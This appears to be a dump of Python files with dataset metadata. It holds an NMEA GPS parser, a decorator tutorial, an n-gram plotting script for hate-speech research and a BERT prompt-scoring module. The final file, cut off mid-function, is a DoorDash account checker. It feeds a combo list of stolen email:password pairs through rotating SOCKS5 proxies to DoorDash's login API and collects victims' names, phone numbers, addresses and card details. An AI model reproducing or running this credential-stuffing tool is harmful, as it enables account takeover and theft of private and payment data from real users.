| 21 | 88 | 0.62585 | 147 | 1,176 | 4.979592 | 0.489796 | 0.054645 | 0.045082 | 0.051913 | 0.040984 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.315476 | 1,176 | 55 | 89 | 21.381818 | 0.909317 | 0.687925 | 0 | 0.363636 | 0 | 0 | 0.092369 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.181818 | false | 0.181818 | 0 | 0 | 0.363636 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
d3604b03b5b7d1f10584723f9cdd33c78d84a311 | 494 | py | Python | 1138_05_19-nmea.py | nchaparr/Geospatial-Analysis-with-Python | 6e0d1ff429baa4205c63bf842ab950ed4176536f | [
"CC0-1.0"
] | null | null | null | 1138_05_19-nmea.py | nchaparr/Geospatial-Analysis-with-Python | 6e0d1ff429baa4205c63bf842ab950ed4176536f | [
"CC0-1.0"
] | null | null | null | 1138_05_19-nmea.py | nchaparr/Geospatial-Analysis-with-Python | 6e0d1ff429baa4205c63bf842ab950ed4176536f | [
"CC0-1.0"
] | null | null | null | """Parse NMEA GPS strings"""
from pynmea.streamer import NMEAStream
nmeaFile = open("nmea.txt")
nmea_stream = NMEAStream(stream_obj=nmeaFile)
next_data = nmea_stream.get_objects()
nmea_objects = []
while next_data:
nmea_objects += next_data
next_data = nmea_stream.get_objects()
# The NMEA stream is parsed!
# Let's loop through the
# Python object types:
for nmea_ob in nmea_objects:
if hasattr(nmea_ob, "lat"):
print "Lat/Lon: (%s, %s)" % (nmea_ob.lat, nmea_ob.lon)
| 30.875 | 59 | 0.712551 | 75 | 494 | 4.466667 | 0.493333 | 0.119403 | 0.107463 | 0.107463 | 0.167164 | 0.167164 | 0 | 0 | 0 | 0 | 0 | 0 | 0.168016 | 494 | 15 | 60 | 32.933333 | 0.815085 | 0.143725 | 0 | 0.181818 | 0 | 0 | 0.074468 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.090909 | null | null | 0.090909 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d3606a910d1904ced1fc96fd6f2ed700d8ae5f9d | 852 | py | Python | languages/python/src/concepts/P104_Decorators_ClassBasedDecorators.py | vikash-india/DeveloperNotes2Myself | fe277a3c52f73884863f2f72b237365b27a8c882 | [
"MIT"
] | 2 | 2019-05-25T10:09:00.000Z | 2022-03-11T09:06:23.000Z | languages/python/src/concepts/P104_Decorators_ClassBasedDecorators.py | vikash-india/DeveloperNotes2Myself | fe277a3c52f73884863f2f72b237365b27a8c882 | [
"MIT"
] | 2 | 2020-03-31T04:30:17.000Z | 2020-10-30T07:54:28.000Z | languages/python/src/concepts/P104_Decorators_ClassBasedDecorators.py | vikash-india/DeveloperNotes2Myself | fe277a3c52f73884863f2f72b237365b27a8c882 | [
"MIT"
] | 4 | 2019-07-12T13:18:56.000Z | 2021-11-17T08:04:55.000Z | # Description: Class Based Decorators
"""
### Note
* If you want to maintain some sort of state and/or just make your code more confusing, use class based decorators.
"""
class ClassBasedDecorator(object):
def __init__(self, function_to_decorate):
print("INIT ClassBasedDecorator")
self.function_to_decorate = function_to_decorate
def __call__(self, *args, **kwargs):
print("CALL ClassBasedDecorator")
return self.function_to_decorate(*args, **kwargs)
# Call Class Based Decorator
@ClassBasedDecorator
def function_1(*args):
for arg in args:
print(arg)
def function_2(*args):
for arg in args:
print(arg)
if __name__ == '__main__':
function_1(1, 2, 3)
# Call Class Based Decorator - Alternate way
function_2 = ClassBasedDecorator(function_2)
function_2(1, 2, 3)
| 23.027027 | 115 | 0.692488 | 109 | 852 | 5.137615 | 0.422018 | 0.071429 | 0.128571 | 0.117857 | 0.085714 | 0.085714 | 0.085714 | 0 | 0 | 0 | 0 | 0.017884 | 0.212441 | 852 | 36 | 116 | 23.666667 | 0.816692 | 0.271127 | 0 | 0.222222 | 0 | 0 | 0.091653 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.222222 | false | 0 | 0 | 0 | 0.333333 | 0.222222 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d363473272e75d741fdc620437d901b3dcaf7ba6 | 1,962 | py | Python | Code/classification_system/data_visualisation/frequent_ngrams.py | sxd942/fascist_text_classification | 29c429165bdd18ca031a30f98cf86a5090818c3c | [
"DOC"
] | null | null | null | Code/classification_system/data_visualisation/frequent_ngrams.py | sxd942/fascist_text_classification | 29c429165bdd18ca031a30f98cf86a5090818c3c | [
"DOC"
] | null | null | null | Code/classification_system/data_visualisation/frequent_ngrams.py | sxd942/fascist_text_classification | 29c429165bdd18ca031a30f98cf86a5090818c3c | [
"DOC"
] | null | null | null | import pandas as pd
import matplotlib.pyplot as plt
from nltk import ngrams
from preprocessing.preprocess import remove_stopwords
"""
frequent_ngrams.py was used to generate bar plots of most frequently used
bi and trigrams from the fascist and hate documents.
@Author: Siôn Davies
Date: July 2020
"""
# First the fascist documents...
df = pd.read_csv('../Datasets/dataset_utils/Gold_cleaned.csv')
df.Message_Post = df.Message_Post.apply(remove_stopwords)
def converter(Fascist_Speech):
if Fascist_Speech == 'Yes':
return 1
else:
return 0
df['Numeric_Label'] = df['Fascist_Speech'].apply(converter)
fascist = df[df.Numeric_Label == 1]
def list_format(data):
words = data.split()
return [word for word in words]
words = list_format(''.join(str(fascist.Message_Post.tolist())))
bigrams_series = (pd.Series(ngrams(words, 2)).value_counts())[:12]
trigrams_series = (pd.Series(ngrams(words, 3)).value_counts())[:12]
bigrams_series.sort_values().plot.barh(color='navy', width=0.7, figsize=(7, 3))
plt.ylabel('Bigram')
plt.xlabel('Frequency')
plt.show()
trigrams_series.sort_values().plot.barh(color='navy', width =0.7, figsize=(7, 4))
plt.ylabel('Trigram')
plt.xlabel('Frequency')
plt.show()
# Now to do the same for the hate documents...
df_hate = pd.read_csv('../Datasets/Multiclass/Hate_Fascist_Gold.csv')
df_hate.Message_Post = df_hate.Message_Post.apply(remove_stopwords)
hate = df_hate[df_hate.Label == 2]
hate_words = list_format(''.join(str(hate.Message_Post.tolist())))
hate_bigrams_series = (pd.Series(ngrams(hate_words, 2)).value_counts())[:12]
hate_trigrams_series = (pd.Series(ngrams(hate_words, 3)).value_counts())[:12]
hate_bigrams_series.sort_values().plot.barh(color='navy', width=0.7, figsize=(7, 3))
plt.ylabel('Bigram')
plt.xlabel('Frequency')
plt.show()
hate_trigrams_series.sort_values().plot.barh(color='navy', width =0.7, figsize=(7, 4))
plt.ylabel('Trigram')
plt.xlabel('Frequency')
plt.show()
| 29.727273 | 86 | 0.735984 | 301 | 1,962 | 4.624585 | 0.328904 | 0.047414 | 0.04023 | 0.057471 | 0.494253 | 0.320402 | 0.278736 | 0.278736 | 0.278736 | 0.278736 | 0 | 0.020513 | 0.105505 | 1,962 | 65 | 87 | 30.184615 | 0.77265 | 0.038226 | 0 | 0.292683 | 1 | 0 | 0.113384 | 0.050263 | 0 | 0 | 0 | 0 | 0 | 1 | 0.04878 | false | 0 | 0.097561 | 0 | 0.219512 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d3836f505332bb014cbedb07ee589147a9cb81f2 | 23,985 | py | Python | prompts/prompt_scorer.py | GpNico/bert_semantics | 9b8f9db7b136d1059e6f82c26fd10d164fe2e78d | [
"MIT"
] | null | null | null | prompts/prompt_scorer.py | GpNico/bert_semantics | 9b8f9db7b136d1059e6f82c26fd10d164fe2e78d | [
"MIT"
] | null | null | null | prompts/prompt_scorer.py | GpNico/bert_semantics | 9b8f9db7b136d1059e6f82c26fd10d164fe2e78d | [
"MIT"
] | null | null | null |
import numpy as np
import pickle
import tqdm
import os
import torch
from prompts.prompt_material import DETS_LIST, CONTENT_STRUCTS_PREFIX_LIST, CONTENT_STRUCTS_MIDDLE_LIST, CONTENT_STRUCTS_SUFFIX_LIST, TRANSFORMATIONS, LOGICAL_PREFIXES_LIST, LOGICAL_STRUCTS_LW_LIST
#######################################
# #
# CONTENT #
# #
#######################################
class ContentPromptScorer:
def __init__(self, model = None, tokenizer = None, device = None, dataset_name = ''):
# Model used to compute scores
self.model = model
self.tokenizer = tokenizer
self.device = device
# Load prompts materials
self.dets_list = DETS_LIST
self.structs_dict = {'prefix': CONTENT_STRUCTS_PREFIX_LIST,
'middle': CONTENT_STRUCTS_MIDDLE_LIST,
'suffix': CONTENT_STRUCTS_SUFFIX_LIST}
# Load transformations names
self.transformations_names = TRANSFORMATIONS
# Define template
self.vanilla_template = '<PREFIX> <DET1> <WORD1> <MIDDLE> <DET2> <WORD2> <SUFFIX>.'
self.key_template = '<det1>-<det2>-<prefix>-<middle>-<suffix>'
# Compute keys
self._compute_keys()
# Where to save data
self.filename = 'prompts\\scores\\content_prompts_scores_{}'.format(dataset_name)
# Compute Prompts
self.create_prompts()
def _compute_keys(self):
"""
Compute all the possible keys in the form idx_{det1}-idx_{det2}-idx_{struct_prefix}-idx_{struct_middle}-idx_{struct_suffix}
"""
N_dets = len(self.dets_list)
N_prefix = len(self.structs_dict['prefix'])
N_middle = len(self.structs_dict['middle'])
N_suffix = len(self.structs_dict['suffix'])
list_of_keys = []
for idx_det1 in range(N_dets):
for idx_det2 in range(N_dets):
for idx_prefix in range(N_prefix):
for idx_middle in range(N_middle):
for idx_suffix in range(N_suffix):
key = self.key_template.replace('<det1>', str(idx_det1)).replace('<det2>', str(idx_det2))
key = key.replace('<prefix>', str(idx_prefix)).replace('<middle>', str(idx_middle)).replace('<suffix>', str(idx_suffix))
list_of_keys.append(key)
self.list_of_keys = list_of_keys
def _from_key_to_words(self, key):
"""
Expect a key of the form idx_{det1}-idx_{det2}-idx_{struct_prefix}-idx_{struct_middle}-idx_{struct_suffix}
"""
list_of_idx = [int(idx) for idx in key.split('-')]
det1 = self.dets_list[list_of_idx[0]]
det2 = self.dets_list[list_of_idx[1]]
prefix = self.structs_dict['prefix'][list_of_idx[2]]
middle = self.structs_dict['middle'][list_of_idx[3]]
suffix = self.structs_dict['suffix'][list_of_idx[4]]
return [det1, det2, prefix, middle, suffix]
def _create_prompt(self, dets, structs):
det1, det2 = dets
prefix, middle, suffix = structs
sentence = self.vanilla_template.replace('<DET1>', det1).replace('<DET2>', det2)
sentence = sentence.replace('<PREFIX>', prefix).replace('<MIDDLE>', middle).replace('<SUFFIX>', suffix)
return sentence
def create_prompts(self):
"""
Returns : keys idx_{det1}-idx_{det2}-idx_{struct_prefix}-idx_{struct_middle}-idx_{struct_suffix}
value sentence
"""
dict_of_prompts = {}
for key in self.list_of_keys:
words_from_keys = self._from_key_to_words(key)
dets, structs = words_from_keys[0:2], words_from_keys[2:5]
sentence = self._create_prompt(dets, structs)
dict_of_prompts[key] = sentence
self.dict_of_prompts = dict_of_prompts
def compute_all_pairs_scores(self, list_of_words):
"""
expect words = list of pairs [HYPONYM, NOUN]
returns : dict -> key "HYPONYM---NOUN"
value dict -> key transf
value dict -> keys idx_{det1}-idx_{det2}-idx_{struct_prefix}-idx_{struct_middle}-idx_{struct_suffix}
value [score_mask1, score_mask2]
"""
# Compute Prompts Scores
if os.path.exists(self.filename): # Previous save
savefile = open(self.filename, 'rb')
all_pairs_scores_dict = pickle.load(savefile)
savefile.close()
else:
all_pairs_scores_dict = {}
num_treated = 0
for words in tqdm.tqdm(list_of_words, total = len(list_of_words)):
word1, word2 = words
key = word1 + '---' + word2
if key in all_pairs_scores_dict.keys(): #If we have already computed this key go to the next
continue
scores_dict = self.batch_compute_one_pair_scores(words)
all_pairs_scores_dict[key] = scores_dict
num_treated += 1
if num_treated % 20000 == 0: #Save from time to time
savefile = open(self.filename, 'wb')
pickle.dump(all_pairs_scores_dict, savefile)
savefile.close()
self.all_pairs_scores_dict = all_pairs_scores_dict
# Save scores
savefile = open(self.filename, 'wb')
pickle.dump(all_pairs_scores_dict, savefile)
savefile.close()
def compute_one_pair_scores(self, words):
"""
expect words = [HYPONYM, NOUN]
returns : dict -> key transf
value dict -> keys idx_{det1}-idx_{det2}-idx_{struct_prefix}-idx_{struct_middle}-idx_{struct_suffix}
value [score_mask1, score_mask2]
"""
# Tokenize the words to know the number of masks to add
word1, word2 = words
masked_token_ids_1 = self.tokenizer(word1)['input_ids'][1:-1]
masked_token_ids_2 = self.tokenizer(word2)['input_ids'][1:-1]
N_masks_1 = len(masked_token_ids_1)
N_masks_2 = len(masked_token_ids_2)
# Construct sentences
scores_dict = {}
for transf in self.transformations_names:
transf_score_dict = {}
for key in self.list_of_keys:
vanilla_sentence = self.dict_of_prompts[key]
sentence, mask1_rank, mask2_rank = self.phi(vanilla_sentence, transf, N_masks_1, N_masks_2)
# Compute input_ids and attention_mask of the sentence
encoding = self.tokenizer(sentence,
return_tensors='pt'
)
input_ids = encoding['input_ids'].to(self.device)
attention_mask = encoding['attention_mask'].to(self.device)
# The model needs the masks_to_predict_pos
masks_to_predict_pos = self.find_masks_pos(input_ids)
score_mask1 = self._compute_model_score(input_ids, attention_mask, masked_token_ids_1, masks_to_predict_pos[mask1_rank - 1])
score_mask2 = self._compute_model_score(input_ids, attention_mask, masked_token_ids_2, masks_to_predict_pos[mask2_rank - 1])
transf_score_dict[key] = [score_mask1, score_mask2]
scores_dict[transf] = transf_score_dict
return scores_dict
def _compute_model_score(self, input_ids, attention_mask, masked_token_ids, masks_to_predict_pos):
# Compute the probabilities and ranks from the model
with torch.no_grad():
probs_n_ranks = self.model.compute_greedy(input_ids, attention_mask, masks_to_predict_pos, masked_token_ids)
# Compute scores
score = probs_n_ranks[:,0].prod()
return score
def batch_compute_one_pair_scores(self, words):
"""
expect words = [HYPONYM, NOUN]
returns : dict -> key transf
value dict -> keys idx_{det1}-idx_{det2}-idx_{struct_prefix}-idx_{struct_middle}-idx_{struct_suffix}
value [score_mask1, score_mask2]
"""
# Tokenize the words to know the number of masks to add
word1, word2 = words
masked_token_ids_1 = self.tokenizer(word1, return_tensors='pt')['input_ids'][:,1:-1].repeat(len(self.list_of_keys),1).to(self.device)
masked_token_ids_2 = self.tokenizer(word2, return_tensors='pt')['input_ids'][:,1:-1].repeat(len(self.list_of_keys),1).to(self.device)
N_masks_1 = masked_token_ids_1.shape[1]
N_masks_2 = masked_token_ids_2.shape[1]
# Construct sentences
scores_dict = {}
for transf in self.transformations_names:
transf_score_dict = {}
sentences = []
mask1_ranks, mask2_ranks = [], []
for key in self.list_of_keys:
vanilla_sentence = self.dict_of_prompts[key]
sentence, mask1_rank, mask2_rank = self.phi(vanilla_sentence, transf, N_masks_1, N_masks_2)
sentences.append(sentence)
mask1_ranks.append(mask1_rank)
mask2_ranks.append(mask2_rank)
# Compute input_ids and attention_mask of the sentence
encoding = self.tokenizer(sentences,
padding = True,
return_tensors='pt'
)
input_ids = encoding['input_ids'].to(self.device)
attention_mask = encoding['attention_mask'].to(self.device)
# The model needs the masks_to_predict_pos
masks_to_predict_pos = self.batch_find_masks_pos(input_ids) # We suppose this is ok
scores_mask1 = self._batch_compute_model_score(input_ids, attention_mask, masked_token_ids_1, self.helper(masks_to_predict_pos, mask1_ranks).to(self.device))
scores_mask2 = self._batch_compute_model_score(input_ids, attention_mask, masked_token_ids_2, self.helper(masks_to_predict_pos, mask2_ranks).to(self.device))
for idx in range(len(self.list_of_keys)):
key = self.list_of_keys[idx]
transf_score_dict[key] = [scores_mask1[idx].item(), scores_mask2[idx].item()]
scores_dict[transf] = transf_score_dict
return scores_dict
def _batch_compute_model_score(self, input_ids, attention_mask, masked_token_ids, masks_to_predict_pos):
# Compute the probabilities and ranks from the model
with torch.no_grad():
probs = self.model.batch_compute_greedy(input_ids, attention_mask, masks_to_predict_pos, masked_token_ids)
# Compute scores
scores = probs.prod(dim=1) # shape [batch_size = len(self.list_of_keys)]
return scores
def batch_find_masks_pos(self, ids_seq):
masks_pos = torch.where(ids_seq == 103)[1]
pos_clusters = []
cluster = []
for k in range(masks_pos.shape[0]):
cluster.append(masks_pos[k])
if (k < len(masks_pos) -1) and (masks_pos[k] + 1 != masks_pos[k + 1]): #The next mask pos does not follow the previous one
pos_clusters.append(torch.LongTensor(cluster))
cluster = []
pos_clusters.append(torch.LongTensor(cluster))
return pos_clusters
def helper(self, list_of_tensors, mask_rank):
batch_size = len(self.list_of_keys)
mask_pos = []
for k in range(batch_size):
mask_pos.append(list_of_tensors[2*k:2*k+2][mask_rank[k] - 1])
return torch.cat(mask_pos)
def find_masks_pos(self, ids_seq):
"""
Compute all mask_token positions in the sequence, then divide it into clusters (following sequence) and returns the mask_rank^th cluster.
"""
def find_all_masks_pos(ids_seq):
pos = []
for k in range(ids_seq.shape[1]):
if ids_seq[0][k] == 103:
pos.append(k)
return pos
all_masks_pos = find_all_masks_pos(ids_seq)
pos_clusters = []
cluster = []
for k in range(len(all_masks_pos)):
cluster.append(all_masks_pos[k])
if (k < len(all_masks_pos) -1) and (all_masks_pos[k] + 1 != all_masks_pos[k + 1]): #The next mask pos does not follow the previous one
pos_clusters.append(cluster)
cluster = []
pos_clusters.append(cluster)
return pos_clusters
def phi(self, vanilla_sentence, transf, N_masks_1, N_masks_2):
"""
Take a sentence s and returns phi(s) and the rank of mask1 (cf. google doc.)
The template vanilla is something like : "MASK1 is MASK2" thus MASK1 is rank 1 and MASK2 is rank 2
Whereas for the transformation opposite : "MASK2 is MASK1" thus MASK1 is rank 2 and MASK2 is rank 1
"""
if transf == 'vanilla':
sentence = vanilla_sentence.replace('<WORD1>', N_masks_1*self.tokenizer.mask_token).replace('<WORD2>', N_masks_2*self.tokenizer.mask_token)
mask1_rank, mask2_rank = 1, 2
elif transf == 'opposite':
sentence = vanilla_sentence.replace('<WORD1>', N_masks_2*self.tokenizer.mask_token).replace('<WORD2>', N_masks_1*self.tokenizer.mask_token)
mask1_rank, mask2_rank = 2, 1
elif transf == 'reverse':
sentence = vanilla_sentence.replace('<WORD1>', N_masks_2*self.tokenizer.mask_token).replace('<WORD2>', N_masks_1*self.tokenizer.mask_token)
mask1_rank, mask2_rank = 2, 1
return sentence, mask1_rank, mask2_rank
#######################################
# #
# LOGICAL #
# #
#######################################
class LogicalPromptScorer:
def __init__(self, model = None, tokenizer = None, device = None, dataset_name = ''):
# Model used to compute scores
self.model = model
self.tokenizer = tokenizer
self.device = device
# Load prompts materials
self.dets_list = DETS_LIST
self.structs_dict = {'prefixes': LOGICAL_PREFIXES_LIST,
'struct_lw': LOGICAL_STRUCTS_LW_LIST}
# Define template
self.vanilla_template = '<PREFIX1> <DET1> <WORD1> <STRUCT_LW> <LW> <PREFIX2> <DET2> <WORD2>.'
self.key_template = '<det1>-<det2>-<prefixes>-<struct_lw>'
# Compute keys
self._compute_keys()
# Where to save data
self.filename = 'prompts\\scores\\logical_prompts_scores_{}'.format(dataset_name)
# Compute Prompts
self.create_prompts()
def _compute_keys(self):
"""
Compute all the possible keys in the form idx_{det1}-idx_{det2}-idx_{prefixes}-idx_{struct_lw}
"""
N_dets = len(self.dets_list)
N_prefixes = len(self.structs_dict['prefixes'])
N_struct_lw = len(self.structs_dict['struct_lw'])
list_of_keys = []
for idx_det1 in range(N_dets):
for idx_det2 in range(N_dets):
for idx_prefixes in range(N_prefixes):
for idx_struct_lw in range(N_struct_lw):
key = self.key_template.replace('<det1>', str(idx_det1)).replace('<det2>', str(idx_det2))
key = key.replace('<prefixes>', str(idx_prefixes)).replace('<struct_lw>', str(idx_struct_lw))
list_of_keys.append(key)
self.list_of_keys = list_of_keys
def _from_key_to_words(self, key):
"""
Expect a key of the form idx_{det1}-idx_{det2}-idx_{struct_prefix}-idx_{struct_middle}-idx_{struct_suffix}
"""
list_of_idx = [int(idx) for idx in key.split('-')]
det1 = self.dets_list[list_of_idx[0]]
det2 = self.dets_list[list_of_idx[1]]
prefixes = self.structs_dict['prefixes'][list_of_idx[2]]
struct_lw = self.structs_dict['struct_lw'][list_of_idx[3]]
return [det1, det2, prefixes, struct_lw]
def _create_prompt(self, dets, prefixes, struct_lw):
det1, det2 = dets
prefix1, prefix2 = prefixes
# Sentence in the right order "This is a seagull, therefore it is a bird."
sentence = self.vanilla_template.replace('<DET1>', det1).replace('<DET2>', det2)
sentence = sentence.replace('<PREFIX1>', prefix1).replace('<PREFIX2>', prefix2).replace('<STRUCT_LW>', struct_lw)
# Sentence in the reverse order "It is a bird, therefore this is a seagull."
sentence_reverse = self.vanilla_template.replace('<DET1>', det2).replace('<DET2>', det1)
sentence_reverse = sentence_reverse.replace('<PREFIX1>', prefix2).replace('<PREFIX2>', prefix1).replace('<STRUCT_LW>', struct_lw)
return sentence, sentence_reverse
def create_prompts(self):
"""
Returns : keys idx_{det1}-idx_{det2}-idx_{prefixes}-idx_{struct_lw}
value [sentence, sentence_reverse]
"""
dict_of_prompts = {}
for key in self.list_of_keys:
words_from_keys = self._from_key_to_words(key)
dets, prefixes, struct_lw = words_from_keys[0:2], words_from_keys[2], words_from_keys[3]
sentence, sentence_reverse = self._create_prompt(dets, prefixes, struct_lw)
dict_of_prompts[key] = [sentence, sentence_reverse]
self.dict_of_prompts = dict_of_prompts
def compute_all_pairs_scores(self, logical_words, list_of_words):
"""
expect words = list of pairs [HYPONYM, NOUN]
returns : dict -> key "HYPONYM---NOUN"
value dict -> keys idx_{det1}-idx_{det2}-idx_{prefixes}-idx_{struct_lw}
value [[score_lw for lw in logical_words], [score_reverse_lw for lw in logical_words]]
"""
# Tokenize the logical words
logical_words_ids = []
for lw in logical_words:
input_ids = self.tokenizer(lw)['input_ids'][1:-1]
assert len(input_ids) == 1 # We only keep logical words mapped to a single token
logical_words_ids.append(input_ids[0])
# Compute Prompts Scores
if os.path.exists(self.filename): # Previous save
savefile = open(self.filename, 'rb')
all_pairs_scores_dict = pickle.load(savefile)
savefile.close()
else:
all_pairs_scores_dict = {}
num_treated = 0
for words in tqdm.tqdm(list_of_words, total = len(list_of_words)):
word1, word2 = words
key = word1 + '---' + word2
if key in all_pairs_scores_dict.keys(): # If we have already computed this key go to the next
continue
scores_dict = self.batch_compute_one_pair_scores(logical_words_ids, words)
all_pairs_scores_dict[key] = scores_dict
num_treated += 1
if num_treated % 20000 == 0: # Save from time to time
savefile = open(self.filename, 'wb')
pickle.dump(all_pairs_scores_dict, savefile)
savefile.close()
self.all_pairs_scores_dict = all_pairs_scores_dict
# Save scores
savefile = open(self.filename, 'wb')
pickle.dump(all_pairs_scores_dict, savefile)
savefile.close()
def compute_one_pair_scores(self, logical_words_ids, words):
"""
expect words = [HYPONYM, NOUN]
returns : dict -> keys idx_{det1}-idx_{det2}-idx_{prefixes}-idx_{struct_lw}
value [[score_lw for lw in logical_words], [score_reverse_lw for lw in logical_words]]
"""
word1, word2 = words
# Construct sentences
scores_dict = {}
for key in self.list_of_keys:
sentence, sentence_reverse = self.dict_of_prompts[key]
sentence = sentence.replace('<WORD1>', word1).replace('<WORD2>', word2).replace('<LW>', self.tokenizer.mask_token)
sentence_reverse = sentence_reverse.replace('<WORD1>', word2).replace('<WORD2>', word1).replace('<LW>', self.tokenizer.mask_token)
# Compute scores for sentence
encoding = self.tokenizer(sentence,
return_tensors='pt'
)
input_ids = encoding['input_ids'].to(self.device)
attention_mask = encoding['attention_mask'].to(self.device)
mask_pos = self.find_mask_pos(input_ids)
scores = self._compute_model_score(input_ids, attention_mask, logical_words_ids, mask_pos)
# Compute scores for sentence_reverse
encoding_reverse = self.tokenizer(sentence_reverse,
return_tensors='pt'
)
input_ids_reverse = encoding_reverse['input_ids'].to(self.device)
attention_mask_reverse = encoding_reverse['attention_mask'].to(self.device)
mask_pos_reverse = self.find_mask_pos(input_ids_reverse)
scores_reverse = self._compute_model_score(input_ids_reverse, attention_mask_reverse, logical_words_ids, mask_pos_reverse)
scores_dict[key] = [scores, scores_reverse]
return scores_dict
def batch_compute_one_pair_scores(self, logical_words_ids, words):
"""
expect words = [HYPONYM, NOUN]
returns : dict -> keys idx_{det1}-idx_{det2}-idx_{prefixes}-idx_{struct_lw}
value [[score_lw for lw in logical_words], [score_reverse_lw for lw in logical_words]]
"""
word1, word2 = words
# Construct sentences
scores_dict = {}
sentences = []
for key in self.list_of_keys:
sentence, sentence_reverse = self.dict_of_prompts[key]
sentence = sentence.replace('<WORD1>', word1).replace('<WORD2>', word2).replace('<LW>', self.tokenizer.mask_token)
sentence_reverse = sentence_reverse.replace('<WORD1>', word2).replace('<WORD2>', word1).replace('<LW>', self.tokenizer.mask_token)
sentences.append(sentence)
sentences.append(sentence_reverse)
# Compute scores for sentence
encoding = self.tokenizer(sentences,
padding = True,
return_tensors='pt')
input_ids = encoding['input_ids'].to(self.device)
attention_mask = encoding['attention_mask'].to(self.device)
mask_pos = self.find_mask_pos(input_ids)
scores = self._batch_compute_model_score(input_ids, attention_mask, logical_words_ids, mask_pos)
for k in range(len(self.list_of_keys)):
key = self.list_of_keys[k]
scores_dict[key] = [scores[2*k], scores[2*k + 1]]
return scores_dict
def _compute_model_score(self, input_ids, attention_mask, masked_token_ids, mask_pos):
# Compute the probabilities and ranks from the model
with torch.no_grad():
probs_n_ranks = self.model.compute_multiple_mono_token(input_ids, attention_mask, mask_pos, masked_token_ids)
# Compute scores
scores = probs_n_ranks[:,0] # drop rank
return scores
def _batch_compute_model_score(self, input_ids, attention_mask, masked_token_ids, mask_pos):
# Compute the probabilities and ranks from the model
with torch.no_grad():
probs = self.model.compute_batch_multiple_mono_token(input_ids, attention_mask, mask_pos, masked_token_ids)
return probs
def find_mask_pos(self, ids_seq):
return torch.where(ids_seq == 103)[1]
| 44.171271 | 197 | 0.603836 | 2,948 | 23,985 | 4.597354 | 0.071235 | 0.019036 | 0.016233 | 0.016528 | 0.750609 | 0.699993 | 0.671733 | 0.635284 | 0.626798 | 0.618166 | 0 | 0.017071 | 0.291724 | 23,985 | 543 | 198 | 44.171271 | 0.780728 | 0.186492 | 0 | 0.537037 | 0 | 0.006173 | 0.048548 | 0.008574 | 0 | 0 | 0 | 0 | 0.003086 | 1 | 0.080247 | false | 0 | 0.018519 | 0.003086 | 0.160494 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d3969c2344d1fd1927504d6b7d57dcf4c82c4a97 | 5,420 | py | Python | eCommerce/DoorDash/accountChecker.py | MiyakoYakota/PythonCheckers | 275c8b674e3ee284548fcd0512f432792e0d8b6d | [
"Unlicense"
] | 5 | 2021-02-24T23:37:52.000Z | 2021-08-18T06:39:30.000Z | eCommerce/DoorDash/accountChecker.py | MiyakoYakota/PythonCheckers | 275c8b674e3ee284548fcd0512f432792e0d8b6d | [
"Unlicense"
] | null | null | null | eCommerce/DoorDash/accountChecker.py | MiyakoYakota/PythonCheckers | 275c8b674e3ee284548fcd0512f432792e0d8b6d | [
"Unlicense"
] | 1 | 2021-03-26T06:21:20.000Z | 2021-03-26T06:21:20.000Z | import requests
import random
import json
from multiprocessing import Pool # Multi-Threading
from multiprocessing import freeze_support # Windows Support
requests.packages.urllib3.disable_warnings()
accounts = [line.rstrip('\n') for line in open("combo.txt", 'r')]
proxies = [line.rstrip('\n') for line in open("proxies.txt", 'r')]
workingJson = []
headers = {
'Content-Type': 'application/json',
}
def generateSocks5ProxyUrl(ip, port, username=None, password=None):
if(username and password):
return {
'http': f"socks5://{username}:{password}@{ip}:{port}",
'https': f"socks5://{username}:{password}@{ip}:{port}"
}
else:
return {
'http': f"socks5://{ip}:{port}",
'https': f"socks5://{ip}:{port}"
}
def generateLoginPayload(email, password):
return {
"email": email,
"password": password
}
def createOutputString(email, password, first_name, last_name, phone_number, account_credits, printable_address, default_card_type, default_card_exp_month, default_card_exp_year, default_card_last4, show_alcohol_experience):
response = f"{email}:{password} | "
if first_name and last_name:
response += f"Name: {first_name} {last_name} | "
if phone_number:
response += f"Phone Number: {phone_number} | "
if account_credits:
response += f"Account Credits: {account_credits} | "
if printable_address:
response += f"Default Address: {printable_address} | "
if default_card_type and default_card_exp_month and default_card_exp_year and default_card_last4:
response += f"Default Card: {default_card_type}*{default_card_last4} Expires {default_card_exp_month}/{default_card_exp_year} | "
if show_alcohol_experience:
response += F"Alcohol Allowed: {str(show_alcohol_experience)} |"
response = response[:-2] + "\n"
return response
def checkAccount(account):
global proxies
proxy = random.choice(proxies)
ip, port, username, password = proxy.split(':')
userEmail, userPassword = account.split(':')
proxyUrl = generateSocks5ProxyUrl(ip, port, username, password)
try:
response = requests.post('https://api.doordash.com/v2/auth/web_login/', proxies=proxyUrl, headers=headers, data=json.dumps(generateLoginPayload(userEmail, userPassword)))
